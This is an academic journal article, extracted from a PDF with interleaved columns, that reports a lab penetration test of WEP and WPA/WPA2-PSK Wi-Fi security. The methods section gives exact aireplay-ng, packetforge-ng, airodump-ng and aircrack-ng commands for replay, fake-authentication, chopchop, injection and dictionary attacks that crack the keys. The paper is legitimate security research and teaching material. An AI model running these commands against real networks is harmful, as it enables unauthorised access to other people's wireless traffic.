See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/342283555

Penetration Testing of IEEE 802.11 Encryption Protocols using Kali Linux

Hacking Tools

Article in International Journal of Computer Applications · June 2020

DOI: 10.5120/ijca2020920365

CITATIONS READS

18 8,203

2 authors:

Michael Kyei Kissi Michael Asante

University of Media, Arts and Communication (UniMAC) Kwame Nkrumah University Of Science and Technology
2 PUBLICATIONS 18 CITATIONS 77 PUBLICATIONS 203 CITATIONS

SEE PROFILE SEE PROFILE

All content following this page was uploaded by Michael Kyei Kissi on 10 July 2020.

The user has requested enhancement of the downloaded file.

 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

Penetration Testing of IEEE 802.11 Encryption Protocols

using Kali Linux Hacking Tools

Michael Kyei Kissi Michael Asante, PhD

Department of Computer Science Department of Computer Science
Kwame Nkrumah University of Science and Kwame Nkrumah University of Science and
Technology Technology
Kumasi, Ghana Kumasi, Ghana

ABSTRACT standards. The 802 handles the Local and Metropolitan Area
The use of wireless network as a medium of communication Network (MAN) whilst the suffix .11 handles the WLAN [3].
has tremendously increased due to its flexibility, mobility and The 802.11 is governed by set of rules or protocols to aid
easy accessibility. Its usage is inevitable at hotels and propagation of wireless signals and communication across the
restaurants, airports, organizations and currently predominant wireless network. The 802.11 employs the Carrier Sense
in homes. As large number of devices connect to wireless Multiple Access (CSMA) and the Medium Access Control
network, valuable and sensitive information are shared among (MAC) protocol with Collision Avoidance (CA). There are
users in the open air, attackers can easily sniff and capture versions of the standard which can be recognized by one or
data packets. This paper aims at using penetration testing to two ending alphabetic characters, these are 802.11a, 802.11b,
assess vulnerabilities and conduct attacks on Wireless 802.11g, 802.11n and 802.11ac [8]. The most common and
Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA) widely used among the standard are the 802.11a, 802.11b and
and 802.11i (WPA2) security protocols. The penetration 802.11g [7].
testing was conducted using Kali Linux with its Aircrack-ng
tools.
2.1 Attacks on WLAN
WLAN uses Radio Frequency (RF) or Infrared Transmission
Keywords Technology for connectivity among devices making it
IEEE, 802.11, WEP, WPA, WPA2, Kali Linux, Aircrack-ng, susceptible to attacks. Attacks on wireless network aims at
WLAN, Wireless, Penetration Testing, Encryption, Security. breaching the integrity and confidentiality of the network
availability and needed information. These attacks are
1. INTRODUCTION categorized into Passive and Active Attacks.
Wireless Network in today’s communication technology is Passive attack: Network traffics are silently eavesdropped or
tremendously increasing due to the benefits it provides such monitored by an attacker and waits until a client seeks to
as flexibility, mobility and easier accessibility. Most hotels connect with the Access Point (AP) or searches for the
and restaurants, coffee shops, airports, organizations and network Service Set Identifier (SSID) as a result the attacker
institutions currently provide open or secured wireless obtains the SSID in plaintext. An attacker can intercept data
connectivity. Nevertheless, wireless network can also be seen transmitted through the network such as Traffic Analysis,
in homes [1]. The IEEE 802.11 Wireless Local Area Network Packet Sniffing, War-Driving and Port Scanning. These types
(WLAN) has evolved to be the easiest and known network of attacks are usually difficult to detect since the attacker does
technology to setup since its inception. Its popularity is as not modify the content or information [9].
result of the use of a Local Area Network (LAN), less
expensive, easy setup installation and configuration Active attack: The attacker does not only gain access to
procedures [2]. The availability of WLAN menaces the information but can make changes to the network information
security of the Network Infrastructure causing challenges for and even inject fraudulent packets to the network. An attacker
Network Administrators as well as the organization. WLAN can initiate commands to disrupt the usual operations of the
signal travels beyond the boundaries of a specified area as network such as Denial of Service (DoS), Session Hijacking,
compared to wired network [3]. [4] noted that the use of the Brute force Attack, Reply Attack, and Man in the Middle
wireless medium is shared among its users in the open air; (MITM) attack [9] [10].
attackers can easily sniff and capture data packets. WLAN
may suffer attacks and damages such as system comprised, 2.2 WLAN Security
data theft, Denial of Service (DoS) and among others [5]. This The WLAN protocols outlined by the IEEE comprise of three
study presents a security assessment of WLAN using security standards, these are Wired Equivalent Privacy
penetration testing tools to examine and exploit identified (WEP), Wi-Fi Protected Access (WPA) and Wi-Fi Protected
vulnerabilities in WLAN security protocols. Penetration Access 2 (WPA2) [11]. [12] stated that WLAN security
testing framework used for the testing was based on the protocols were designed to protect the network from several
National Institute of Standards and Technology (NIST) [6]. breaches due to susceptibility of the Wi-Fi transmission
The framework involves four phases namely; Planning Phase, signals which has no limited boundaries, hence, they are
Discovery Phase, Attack Phase and Reporting Phase. prone to illegitimate access. According to [13] a secured
WLAN must have five key requirements, namely;
2. LITERATURE REVIEW Authentication, Access Control, Confidentiality, Non-
The IEEE 802.11 gives a criterion for WLAN Repudiation and Data Integrity. In spite of this WLAN
communications among devices [7]. The IEEE in 1997 security are prone to threats such as Eavesdropping and traffic
developed the 802.11 standard which is a subset of the 802 analysis, Denial of Service, Masquerade, forged packets and

26
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

among others. 2.3.1.3 No Mutual Authentication

WEP authentication is client-centered or one-way
2.3 Wired Equivalent Privacy (WEP) authentication. The client cannot prove its identity to the AP,
The IEEE 802.11 developed WEP in 1999 to endow security only the AP authenticates the client since the WEP Key is
for wireless network as compared to the wired [3]. The WEP configured on the AP [19].
encryption is based on RC4 symmetric stream cipher with 40-
bit and 104-bit encryption keys [7]. WEP involves two
parameters, an Initialization Vector (IV) which is a three (3)
2.3.1.4 Forged Authentication Messages
An attacker eavesdrops and monitors packets transmitted in
byte value and shared WEP Key of hexadecimal digits for
order to uncover the RC4 stream cipher used for encryption
encryption and decryption. WEP appends a 32-bit Cyclic
[20]. The stream obtained is used to encrypt any challenge
Redundancy Check (CRC) checksum to each transmitted data
received since an attacker can forge a valid authentication
frame. The 24-bit IV which is randomly selected together with
packet out of the keystream.
the secret key sent to the RC4 to produce a keystream. The
plaintext is XORed with the RC4 keystream to create a cipher 2.3.2 Attacks on WEP
text as illustrated in figure 1.
2.3.2.1 Chopchop Attack
The Chopchop attack decrypts the entire WEP packet without
knowing the WEP Key. An attacker decrypts the last n bytes
of plaintext of encrypted packet by sending an average of
n*128 packets on the network [21]. The Chopchop attack
exploit the vulnerability of the 4-byte checksum used for the
integrity of the encrypted packets [22].

2.3.2.2 Fluhrer, Mantin and Shamir (FMS) Attack

Figure 1: WEP Data Frame Encryption [14] The FMS attack is a statistical attack discovered by Fluhrer,
[15], WEP decrypts received data frames by regenerating the Mantin and Shamir. The attack is as a result of the use of
keystream using the RC4 (IV and shared key) and then weak Initialization vectors (IV’s) in RC4 algorithm [23]. [24]
XORed with the cipher text to retrieve the plaintext. A new describes the “weak” IVs of having a structure of B+3::ff:X
checksum is computed and compared with the received (where B is the byte of key, ff being constant value of 255,
checksum. The plaintext is obtained if the two checksums are and X is irrelevant). The attacker can determine the value of B
equal as shown in figure 2. by using the information of the plaintext found in the headers
of certain packets, like the Address Resolution Protocols
(ARPs) [25].

2.3.2.3 ARP Replay Attack

IVs are freely reused and has no sequence number to validate
replayed packets, this gives room for an attacker to generate
more packets from the captured packets [26]. ARP Request
packets are easily identified based on the destination MAC
Figure 2: WEP Data Frame Decryption [14] address and fixed size. The attacker sniffs ARP Request
packets from a legitimate host and keeps replaying that ARP
2.3.1 Weakness and Vulnerabilities in WEP Request and the host response with ARP Reponses and
WEP uses RC4 algorithm and secret key to provide access therefore more traffic is generated. When enough data packets
control and confidentiality, and the CRC checksum for data with weak IVs are collected, the WEP Key is easily cracked
integrity [15]. With these security control mechanisms, WEP within a short period.
security protocol has vulnerabilities and can be exploited by
attackers. 2.4 Wi-Fi Protected Access (WPA)
Wi-Fi Alliance created WPA in 2003 to improve the existence
2.3.1.1 Short IV Size and Keystream Reuse of vulnerabilities and flaws in WEP [20]. WPA improves data
The IV has a size of 24 bits processing 16,777, 216 different encryption using a hashing algorithm called Temporal Key
RC4 cipher streams for a given WEP key and transmitted in Integrity Protocol (TKIP) which scramble the keys and adds
clear text for each packet [16]. IV is used to alter the an integrity check feature to prevent tampering of the
keystream, when the IV value changes so do the keystream. encrypted keys [20]. TKIP uses the RC4 encryption algorithm
When more traffics are sent, unique IVs cannot be generated same as WEP but uses hash value to determine the uniquely
after transmitting 224 packets, hence, there is a possibility of generated temporal key for each packet traversed. TKIP make
IVs repeating (reuse) because the 24-bits space will be use of Message Integrity Code (MIC) for integrity check
exhausted. instead of the ICV used with WEP. This prevents attackers
from injecting data into a packet to find the keystream used to
2.3.1.2 Integrity Check Value (ICV) Insecurity encrypt the data [27]. It also uses sequence counters to
The availability of the ICV or CRC checksum is to safeguard prevent replay attacks which improves integrity check.
packets in transit, preventing attackers from altering the
packets [17]. The CRC is a linear function which means an 2.5 Wi-Fi Protected Access 2 (WPA 2)
attacker can modify encrypted messages and fix the ICV to Wi-Fi Alliance improved WPA in 2004 by designing the
obtain a genuine message. An attacker with a valid keystream 802.11i (WPA2) which uses the concept of Robust Security
can create arbitrary messages, compute the checksum and Network (RSN) [20] [10]. It tackles three key security areas
encrypt it using the keystream since WEP allows IV reuse namely; Data Transfer Privacy, Authentication and Key
[18]. Management [28]. WPA2 uses Advanced Encryption
Standard (AES) called Counter Mode Cipher Block Chaining

27
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

- Message Authentication Code (CBC-MAC) protocol 3. Authenticator to Supplicant

(CCMP) for data encryption [29] [30]. CCMP was created as The PMK is used to decrypt it and acquires the SNonce and
part of the 802.11 security for the 802.11i (WPA2) to replace MIC when the AP receives the second message. The AP uses
WEP and TKIP [10]. The AES uses the Rijindael algorithm the received MIC to check for data integrity. The AP also
consisting of a block cipher using 128-bit, 192-bit or 256-bit derives its PTK using the same inputs and installs if the MIC
key. AES permits the use of a single encryption key to all value is valid.
packets, which removes the challenges associated with key
scheduling and key distribution related to WEP and TKIP 4. Supplicant to Authenticator
protocols [31]. Both supplicant and AP check whether the PTKs are equal by
decrypting the third message. The supplicant installs the PTK
2.5.1 WPA/WPA2-PSK Four-Way Handshake for encrypted unicast transmission and Group Transient Key
WPA/WPA2 uses dynamic keys generated from per-packet to (GTK) for broad or multicast transmission.
generate the Pairwise Master Key (PMK). According to [32],
the four-way handshake provides mutual authentication based
on the PMK, and agrees on a fresh session key known as the
Pairwise Transient Key (PTK). The four-way handshake
contains four packets (messages) exchange that occurs
between the client (Supplicant) and the AP (Authenticator).
The PMK is generated by using the hashing algorithm
PBKDF2 which requires inputs:
PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
Where:
Passphrase: The passphrase (8 to 63 characters)
SSID: the SSID of the Authenticator (AP)
Figure 3: Generation of WPA/WPA2 Four-way
SSIDlen: the length of the SSID
Handshake [33]
4096: Number of hashing iterations (through SHA1
algorithm) 2.5.2 Weakness and Vulnerabilities in
WPA/WPA2
256: Intended Key Length of the PSK All values needed to compute the PTK from the PMK are
PTK which is a dynamic key is used to produce the four-way transmitted unencrypted in the four-way handshake. The PTK
handshake during authentication. The PMK and two Nonces is a temporary key used in order not to broadcast the PMK
are used to create the PTK when connection happens [33]. and relevant information from the four-way handshake. The
weakness in WPA-PSK is as a result of the PMK [14]. The
PTK = Function (PMK, Authenticator Nonce (ANonce), PMK is derived by using the hashing algorithm PBKDF2
Supplicant Nonce (SNonce), Authenticator MAC, Supplicant (Passphrase, SSID, SSIDlen, 4096, 256). The attacker uses the
MAC) PBKDF2 algorithm by inserting the SSID, own generated
Where, passphrase and SSID length to compute a hashed key and
compares it with the captured hashed key. The attacker
PMK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256) succeeds if the two hash values matches, hence, the valid
passphrase is obtained. Information such as Client and AP
PTK = Function ((Passphrase, SSID, ssidLen, 4096, 256),
MAC addresses, ANonce, SNonce and MIC value are
ANonce, SNonce, Authenticator MAC, Supplicant MAC)
transmitted in clear text together with the PMK are used to
Messages exchanged in the four-way handshake are defined generate the PTK. An attacker can use brute force techniques
by using Extensible Authentication Protocol over LAN and dictionary attack to discover or crack the WPA Key [10]
(EAPOL) frames. The EAPOL-Key contain in the four-way [14] [35]. If the password exists in the attacker dictionary or
handshake is used for the purpose of key exchange and wordlist, the WPA key will be successfully cracked.
negotiation [34]. The four-way handshake between the
supplicant and authenticator starts after the generation of the 2.5.3 Attack on WPA/WPA2
PMK. Figure 3 shows an illustration of the generation of four- WPA/WPA2 is vulnerable to attacks against the four-way
way handshake and installation of the PTK handshake and encryption protocol [36]. PTK generation is
based on the PMK, Authenticator MAC, Supplicant MAC and
1. Authenticator to Supplicant Nonces. With the exception of the PMK, the other parameters
Authenticator (AP) generates a long arbitrary value called are transmitted in plaintext throughout the four-way
Authenticator Nonce (ANonce) then encrypt it using the PMK handshake. The only unknown value to the attacker in
(unknown to the supplicant) for the generation of PTK at the computing the PMK is the passphrase (PSK) which can be
supplicant station. guessed correctly by the attacker carrying out a dictionary
attack with a valid four-way handshake captured. The
2. Supplicant to Authenticator
passphrase will be known to the attacker if it exists in the
The supplicant replies the received message to the
dictionary or wordlist [14] [37].
authenticator by generating its own long random value called
Supplicant Nonce (SNonce). The ANonce, SNonce and PMK 3. METHODOLOGY
are used to generate the PTK by the supplicant. MIC is The chosen environment for performing the assessment and
generated using cryptographic hash (HMAC-SHA1) for penetration testing was to set up a WLAN infrastructure as an
integrity check of the key installed on the supplicant side. experimental network laboratory. The study considered to use

28
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

the network laboratory in order not compromise any

individual or organization network due to privacy and legality
of user information.

3.1 Laboratory Experiment Setup and

Requirements
The experiment required the use of an Authenticator (wireless
router), an external wireless adapter and two laptops (one as
the PenTester PC and other as the supplicant, the supplicant Figure 6: Detection of ARP Request Packets
could be any device with wireless connectivity). Figure 4 The attacker uses the MAC address of the client
illustrate the connections of the used devices. (AC:36:13:6C:6F:4A) in order not to be rejected by the AP to
repeatedly reply the received ARP Request packets and
receive ARP Responses generating more packets with weak
IVs using the command “aireplay-ng --arpreplay -e
SecurityTest -h AC:36:13:6C:6F:4A wlan0mon”.
The attacker successfully generates more packets (70593) as
shown in figure 7.

Figure 4: Setup for Penetration Testing

3.2 Exploiting Vulnerabilities in IEEE

802.11 WEP Security Protocol Figure 7: Successful Generation of ARP Packets by
Three vulnerabilities were discovered and exploited in the Attacker
IEEE 802.11 WEP security protocol through the penetration
testing conducted. 3.2.2 No Mutual Authentication makes it
Vulnerable to Fake Authentication Attack
3.2.1 No Replay Protection Mechanism in WEP A fake authentication was conducted and the attacker was
The packets were repeatedly replayed into the network to successfully associated with the AP as a result of no mutual
generate more packets with weak IVs. The IVs are weak authentication. The follow indicates the experiment steps:
because the IV space is short and easily get exhausted
resulting in reuse of the IVs. The following steps indicates Attacker uses the command “aireplay-ng --fakeauth 0 -a
how the vulnerability was exploited. 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
conducts a fake authentication using its MAC address
The command, “airodump-ng wlan0mon” was used to (00:C0:CA:83:01:CD) and the AP MAC address
discover the wireless network, sniff and capture data packet. (98:FC:11:EE:41:25) since the AP only authenticates its
The wlan0mon is the monitor mode interface of the wireless clients. Figure 8 shows how authentication request and
card which has a MAC address of 98:FC:11:EE:41:25 association request were successfully acknowledged by the
(targeted AP). Sniffed and captured data packets were saved AP. This means that the attacker got connected to the AP.
to a file called arp-test using the command “airodump-ng --
channel 6 --bssid 98:FC:11:EE:41:25 --write arp-test
wlan0mon” as shown in figure 5.

Figure 5: Capture of Data Packets on Targeted Access

Point
The command “aireplay-ng --arpreplay -e SecurityTest Figure 8: Successful Fake Authentication and Association
wlan0mon” was used to detect ARP Request packets to be with Target AP by Attacker
replayed for the AP to send ARP Response packets to enable
the attacker generate more packets. Figure 6 shows that data 3.2.3 WEP is Vulnerable to Message Modification
packets (59 packets) were received but no ARP Request and Injection Due to ICV Insecurity
packet was detected as a result of the attacker’s MAC address The WEP security protocol could not detect modified packets
(00:C0:CA:83:01:CD). or differentiate between the original and forged packets. The
following steps indicates the existence of the vulnerability:
Attacker uses the command “aireplay-ng --chopchop - a
98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon” to
decrypt the captured encrypted data packets to obtain the
keystream (replay_dec-0713-213506.xor) and plaintext
(replay_dec-0713-213506.cap) as shown in figure 9.

29
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

3.3 Exploiting Vulnerabilities in IEEE

802.11 WPA/WPA2-PSK Encryption
Protocol
Three vulnerabilities associated with the security protocol
were discovered as follows:
1. Four-way handshake is transmitted unencrypted
(plaintext).
Figure 9: Capture of Keystream and Plaintext files 2. Message Integrity Check (MIC) is unencrypted
(plaintext).
Attacker modified or forged new packets out of the keystream
and compute the checksum using the command “packetforge- 3. Derivation Formulae for Computing PMK and PTK are
ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k known to the Attacker.
255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-
213506.xor -w packetforge-test” and saves the packets to a Attacker requires the capture of a valid four-way handshake
file called packetforget-test. (contains the MIC and inputs to derived the PMK and PTK)
and a wordlist to conduct a dictionary attack to crack the PSK
The command “aireplay-ng -2 -r packetforge-test wlan0mon”, (passphrase) which is unknown to the attacker.
was used to inject the forged packets into the AP or traffic to
generate data packets with new IVs as shown in figure 10. Figure 12 shows a successful capture of the four-way
These generated packets help to speed up the cracking process handshake and saved to file called wpa-handshake using the
of the WEP Key. command “airodump-ng --channel 6 --bssid
98:FC:11:EE:41:25 --write wpa-handshake wlan0mon”.

Figure 12: Successful Capture of WPA Handshake

3.3.1 Cracking of WPA/WPA2-PSK Passphrase

With the captured WPA Handshake and wordlist or dictionary
of passwords, aircrack-ng was used to crack the WPA
Figure 10: Generation of New IVs from Forged Packets
Passphrase using the command “aircrack-ng wpa-handshake-
3.2.4 Cracking of IEEE 802.11 WEP Encryption 01.cap -w passwords”. The passphrase or WPA Key was
successfully cracked as shown in figure 13.
Protocol Key
“Aircrack-ng” tool was run parallel as more packets with
weak IVs were generated. With 51326 IVs, 698 possible keys
were tested and the WEP key was successfully cracked as
shown in figure 11.

Figure 13: WPA- PSK Key (Passphrase) Successfully

Cracked

4. RESULTS ANALYSIS
Vulnerabilities discovered enabled a successful crack of the
wireless security protocols.
Figure 11: WEP Key Successfully Cracked

30
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

4.1 Analysis on Vulnerabilities in IEEE

802.11 WEP Encryption Protocol
4.1.1 No Replay Protection Mechanism in WEP
Packets (70593) were successfully captured and repeatedly
replayed into the network to generate more packet with weak
IVs which aided in the cracking of the WEP Key. ARP
packets (18112) that were used for the replay attack were Figure 17: Saved Plaintext and Keystream files
successfully captured and injected into network to generate
packets as shown in figure 14. 4.1.4 Cracking of IEEE 802.11 WEP Encryption
Protocol Key
WEP was based on confidentiality, not authorization that uses
RC4 stream cipher and CRC-32 checksum as integrity to
encrypt WEP Key. WEP is vulnerable to attacks due to the
implementation of IV mechanism. The 24-bit IV space gets
exhausted within few hours and these IVs are duplicated. The
Chopchop attack was used to crack the WEP Secret Key. The
Chopchop attack method developed by KoreK, exploits
Figure 14: ARP Packets Generated by Attacker vulnerability in WEP security protocol itself rather than the
4.1.2 No Mutual Authentication makes it weakness in the RC4 algorithm. Without knowing the secret
key, the attacker was able to capture and decrypt encrypted
Vulnerable to Fake Authentication Attack packets to obtain the keystream and plaintext. The keystream
The attacker successfully performed a Fake Authentication and plaintext are XORed to produce a fake cipher text which
and got associated with the AP gaining access to network is injected into the network to generate more packets with
resources. Figure 15 shows an acknowledgement of a weak IVs. The IVs are transmitted in clear text concatenated
successful Authentication and Association by the AP as with the secret shared Key. As weaker IVs are generated it
highlighted. increases the success of cracking the WEP key. With 51326
weak IVs generated, the WEP Key was successfully cracked
as shown in figure 18.
The outcome of the result shows that WEP is vulnerable to
attacks. The WEP key can be cracked without any active
client connected to the network. Also without knowing the
Figure 15: Successful fake Authentication and Association WEP key, the plaintext and the keystream can be obtained
with Target AP by Attacker which is used to crack the key successfully.
The attacker MAC Address (00:C0:CA:83:01:CD) was
indicated in the discovered list of clients that are connected to
the AP with MAC Address (98:FC:11:EE:41:25) as shown in
figure 16.

Figure 16: Attacker Connects to Access Point

4.1.3 WEP is Vulnerable to Message Modification

and Injection Due to ICV Insecurity
Using the “chopchop” attack method, the attacker was able to Figure 18: WEP Key Successfully cracked
decrypt encrypted packets without knowing the secret key.
The attacker chops away the last byte of the captured 4.2 Analysis on Vulnerabilities in IEEE
encrypted packet and substitutes the value of the last byte, 802.11 WPA/WPA2-PSK Encryption
recalculates the encryption checksum and injects the modified
packet into the network, if the AP accepts the modified Protocol
packets means the attacker’s guess was correct else the packet WPA/WPA2-PSK is vulnerable to attacks as a result of the
is rejected by the AP. An invalid packet is as a result of four-way handshake which is transmitted unencrypted
incorrect ICV which means the attacker computes the (plaintext). All the parameters used to conduct the mutual
checksum to validate the forged or modified packets. The authentication (PMK and PTK generation) between the
decrypted packet contains the keystream (replay_dec-0713- supplicant and authenticator (AP) are known to an attacker
213506.xor) file and plaintext (replay_dec-0713-213506.cap) except the passphrase. The formulae derivation of the PMK
file as shown in figure 17. The captured keystream is used for and PTK are as follows:
the generation of forged valid packets to be accepted by the PMK = PBKDF2 (Passphrase, SSID, SSIDlen, 4096, 256)
AP.
PTK = Function (PMK, ANonce, SNonce, Authenticator
MAC, Supplicant MAC).
The captured four-way handshake was analyzed with

31
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

Wireshark. The first message of the EAPOL Handshake was

transmitted from the AP to the Supplicant which comprise of
a random number (256 bits) called ANonce for PTK
generation at the Supplicant. The AP MAC Address and
ANonce were known as highlighted in figure 19.

Figure 21: Successful Crack of WPA/WPA2-PSK

Passphrase

5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN Security
protocols using penetration testing, it is proven that WEP and
WPA/WPA2-PSK are vulnerable to attacks. In WEP, the
entire size of the IV space is 24-bit which gets exhausted
within a short time and cause the IVs to repeat itself as more
Figure 19: First Message of the WPA Four-way packets are being generated. Cracking of WEP Key is
Handshake (ANonce and AP MAC Address) dependent on the generating of more weak IVs. Once enough
weak IVs are generated the key will be successfully cracked.
The Supplicant sends the second message as a reply to the
The CRC32 checksum (ICV) aim is to verify data integrity by
first EAPOL Handshake message by sending its SNonce in preventing alter of data packets in transit. The ICV is related
plain text to the Authenticator encrypted by a cryptographic
to the plaintext not to the cipher text. Fake cipher text
hash algorithm (HMAC-SHA1) called the MIC for integrity
generated does not affect the ICV, therefore, the ICV unable
of the installed key on the supplicant side as highlighted in
to achieve its aim. In the case of WPA/WPA2-PSK, the four-
figure 20. An MIC is computed for each PTK by the AP and
way handshake between the client and the AP is easy to be
compared with the captured MIC in the second message of the
captured by an attacker and determine the PMK and PTK
EAPOL Handshake. If they are equal, the attacker derives
since it is dependent on the captured of the four-way
same PTK and the passphrase is cracked.
handshake. WPA/WPA2-PSK will be successfully cracked if
only the passphrase exists in the attacker’s wordlist or
dictionary file since the PMK and PTK can be determined.

6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C., (2014).
Technology, Media & Telecommunications Predictions.
London: Deloitte report, pp. 1-60, 2014.
[2] Waliullah Md., Moniruzzaman A. B. M., and Sadekur
Rahman Md., (2015). An Experimental Study Analysis
of Security Attacks at IEEE 802.11 Wireless Local Area
Network. International Journal of Future Generation
Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G., (2013). Penetration Testing on a Wireless
Network Using Backtrack 5. Turku University of
Applied Sciences.
[4] Chen Z., Guo S., Zheng K., and Li H., (2009). Research
on man-in-the-middle denial of service attack in sip
Figure 20: Second Message of the WPA Four-way VoIP," Networks Security, Wireless Communications
Handshake (SNonce, MIC and Client MAC Address) and Trusted Computing, NSWCTC, vol. 2, pp. 263-266,
The Passphrase of the WPA/WPA2-PSK was successfully Apr. 2009.
obtained as shown in figure 21 indicating the PMK, PTK and [5] Appiah, J. K., (2014). Network and Systems Security
the MIC using cryptographic hash algorithm (HMAC-SHA1). Assessment using penetration testing in a university
The outcome of this study implies that WPA/WPA2-PSK is environment: The case of Central University College.
vulnerable to dictionary attack. Attacker can crack Kwame Nkrumah University of Science and Technology,
WPA/WPA2-PSK if the passphrase exists in dictionary or Kumasi.
wordlist. [6] National Institute of Standards and Technology (NIST),
(2008). Technical Guide to Information Security Testing
and Assessment, Special Publication 800-115,
Gaithersburg.

32
 International Journal of Computer Applications (0975 – 8887)
Volume 176 – No. 32, June 2020

[7] Praveen L., Ravi S. Y., and Keshava R. M. (2011). Bio-Inspired Network. Liverpool John Moores
Securing IEEE 802.11g WLAN Using OPENVPN and University.
Its Impact Analysis. International Journal of Network
Security & Its Applications (IJNSA), Vol.3, No.6, [23] Kurup L., Shah V. and Shah D., (2014). Comparative
November 2011. Study of Attacks on Security Protocols. International
Journal of Advanced Research in Computer Engineering
[8] Kropeit T. (2015), Don’t Trust Open Hotspots: Wi-Fi & Technology (IJARCET) Volume 3 Issue 8, August
Hacker Detection and Privacy Protection via 2014
Smartphone. Ruhr-Universitat Bochum.
[24] Fluhrer S., Mantin I. and Shamir A., (2001). Weaknesses
[9] Forouzan B., (2008). Data Communications & in the Key Scheduling Algorithm of RC4. Eighth Annual
Networking. 4th edition. New York: McGraw-Hil Workshop on Selected Areas in Cryptography, August
2001.
[10] L’ubomir Z., (2012). Security of Wi-Fi Networks.
Comenius University, Bratislava [25] Hulin K., Locke C., Mealey P., and Pham A., (2010).
“Analysis of wireless security vulnerabilities, attacks,
[11] Bilger J., Cosand H., Singh N. and Xavier J. (2005). and methods of protection”. Information Security
Security and Legal Implications of Wireless Networks, Semester Project, 2010.
Protocols, and Devices
[26] [Robyns P., (2014). Wireless Network Privacy. Hasselt
[12] Shweta T., Pratim K., Sumedh K, and Aniket G., (2013). University
“Study of Vulnerabilities of Wlan Security Protocols,”
Journal, Dep. Comput. Eng. Fr. C. Rodrigues Inst. [27] Zarch S. H. M., Jalilzadeh F., and Yazdanivaghef M.,
Technol. Vashi, Navi Mumbai, no. September, pp. 109– (2012). Encryption as an Impressive Instrumentation in
112, 2013 Decrease Wireless WAN Vulnerabilities. International
Journal of Scientific and Research Publications, Volume
[13] Memon A. Q., Raza A. H. and Iqbal S., (2010). WLAN 2, Issue 12, December 2012, ISSN 2250-3153
Security. Halmstad University School of Information
Science, Computer and Electrical Engineering. Technical [28] Papaleo, G. (2006). Wireless Network Intrusion
report, IDE1013, April 2010. Detection System: Implementation and Architectural
Issues: Universita degli Studi di Genova.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne
S., (2012). Vulnerabilities of Wireless Security protocols [29] Ciampa M. D., (2012). Security+ Guide to Network
(WEP and WPA2). International Journal of Advanced Security Fundamentals. Course Technology, Cengage
Research in Computer Engineering & Technology. Learning.
Volume 1, Issue 2, April 2012
[30] Laverty D., (n.d.). WPA versus 802.11i (WPA2): How
[15] Park T., Wang H., Cho M., Shin K. G., (2002). Enhanced your Choice Affects your Wireless Network Security.
Wired Equivalent Privacy for IEEE 802.11 Wireless http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
LANs: The University of Michigan
[31] Mkubulo D., (2007). Analysis of Wi-Fi Security
[16] Intercop Net Labs, (2002). "What's Wrong with WEP?" Protocols and Authentication Delay. The Florida State
Retrieved from University, FAMU-FSU College of Engineering
http://www.opus1.com/www/whitepapers/whatswrongwi
thwep.pdf (Accessed on May 10, 2018) [32] Vanhoef M., and Piessens F., (2017). Key Reinstallation
Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet,
[17] Borisov N., Goldberg I., and Wagner D., (2001). KU Leuven
Security of the WEP algorithm Retrieved from
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [33] Ramachandran, V. (2011), BackTrack 5 Wireless
(Accessed on April 24, 2018) Penetration Testing, Master Bleeding Edge Wireless
Testing Techniques with BackTrack 5: Packt Publishing,
[18] Kiemele L., (2011). Wireless Network Security. Birmingham UK
V00154530
[34] Noh J., Kim J., and Cho S., (2018). Secure
[19] Zahur Y. and Yang T., (2004). “Wireless LAN Security Authentication and Four-Way Handshake Scheme for
and Laboratory Designs”. University of Houston Clear Protected Individual Communication in Public Wi-Fi
Lake CCSC, Journal of Computing Sciences in Colleges, Networks. Digital Object Identifier 10.1109/IEEE
vol. 19, no. 3, January 2004, pp. 44-60. ACCESS.2018.2809614
[20] Bulbul H. I., Batmaz I. and Ozel M., (2008). Wireless [35] Kaplanis C., (2015). Detection and prevention of Man in
Network Security: Comparison of WEP (Wired the Middle attacks in Wi-Fi Technology
Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected
Access) and RSN (Robust Security Network) Security [36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan
Protocols. Gazi University Y. (2012). “Assessment of Security and Vulnerability of
Home Wireless Networks”, IEEE 9th International
[21] Gupta S., (2012). Wireless Network Security Protocols- Conference on Fuzzy Systems and Knowledge
A Comparative Study, IJETAE, 2012 Discovery, Chongqing, China, 29-31 May, 2012, pp.
2133-2137.
[22] Alselwi A., (2015). Wireless Security Protocol in DNA

IJCATM : www.ijcaonline.org 33

View publication stats